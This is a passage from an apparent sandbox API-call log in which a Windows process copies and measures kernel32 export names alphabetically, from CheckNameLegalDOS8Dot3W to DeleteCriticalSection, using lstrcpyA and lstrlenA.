lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0048.193] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0048.193] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0048.193] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0048.193] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0048.193] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0048.193] lstrcpyA (in: lpString1=0x341f130, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0048.194] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0048.194] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0048.194] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0048.194] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0048.194] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0048.194] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0048.194] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0048.194] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0048.194] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0048.194] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0048.194] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0048.194] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0048.194] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0048.194] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0048.194] lstrcpyA (in: lpString1=0x341f130, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0048.195] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0048.195] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0048.195] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0048.195] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0048.195] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0048.195] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0048.195] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0048.195] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0048.195] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0048.195] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0048.195] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0048.195] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0048.195] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0048.195] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0048.195] lstrcpyA (in: lpString1=0x341f130, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0048.196] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0048.196] lstrlenA (lpString="COPYCONTEXT") returned 11 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0048.196] lstrlenA (lpString="COPYFILEA") returned 9 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0048.196] lstrlenA (lpString="COPYFILEEXA") returned 11 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0048.196] lstrlenA (lpString="COPYFILEEXW") returned 11 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0048.196] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0048.196] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0048.196] lstrlenA (lpString="COPYFILEW") returned 9 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0048.196] lstrlenA (lpString="COPYLZFILE") returned 10 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0048.196] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0048.196] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0048.196] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0048.196] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0048.196] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0048.197] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0048.197] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0048.197] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0048.197] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0048.197] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0048.197] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0048.197] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0048.197] lstrlenA (lpString="CREATEEVENTA") returned 12 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0048.197] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0048.197] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0048.197] lstrlenA (lpString="CREATEEVENTW") returned 12 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0048.197] lstrlenA (lpString="CREATEFIBER") returned 11 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0048.197] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0048.197] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0048.197] lstrlenA (lpString="CREATEFILEA") returned 11 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0048.198] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0048.198] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0048.198] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0048.198] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0048.198] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0048.198] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0048.198] lstrlenA (lpString="CREATEFILEW") returned 11 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0048.198] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0048.198] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0048.198] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0048.198] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0048.198] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0048.198] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0048.198] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0048.199] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0048.199] lstrlenA (lpString="CREATEJOBSET") returned 12 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0048.199] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0048.199] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0048.199] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0048.199] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0048.199] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0048.199] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0048.199] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0048.199] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0048.199] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0048.199] lstrlenA (lpString="CREATEPIPE") returned 10 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0048.199] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0048.199] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0048.199] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0048.200] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0048.200] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0048.200] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0048.200] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0048.200] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0048.200] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0048.200] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0048.200] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0048.200] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0048.200] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0048.200] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0048.200] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0048.200] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0048.200] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0048.200] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0048.200] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0048.200] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0048.200] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0048.200] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0048.200] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0048.200] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0048.201] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0048.201] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0048.201] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0048.201] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0048.201] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0048.201] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0048.201] lstrlenA (lpString="CREATETHREAD") returned 12 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0048.201] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0048.201] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0048.201] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0048.201] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0048.201] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0048.201] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0048.201] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0048.202] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0048.202] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0048.202] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0048.202] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0048.202] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0048.202] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0048.202] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0048.202] lstrlenA (lpString="CTRLROUTINE") returned 11 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0048.202] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0048.202] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0048.202] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0048.202] lstrlenA (lpString="DEBUGBREAK") returned 10 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0048.202] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0048.202] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0048.202] lstrcpyA (in: lpString1=0x341f130, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0048.203] lstrlenA (lpString="DECODEPOINTER") returned 13 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0048.203] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0048.203] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0048.203] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0048.203] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0048.203] lstrlenA (lpString="DELETEATOM") returned 10 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0048.203] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0048.203] lstrcpyA (in: lpString1=0x341f130, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0048.203] lstrlenA 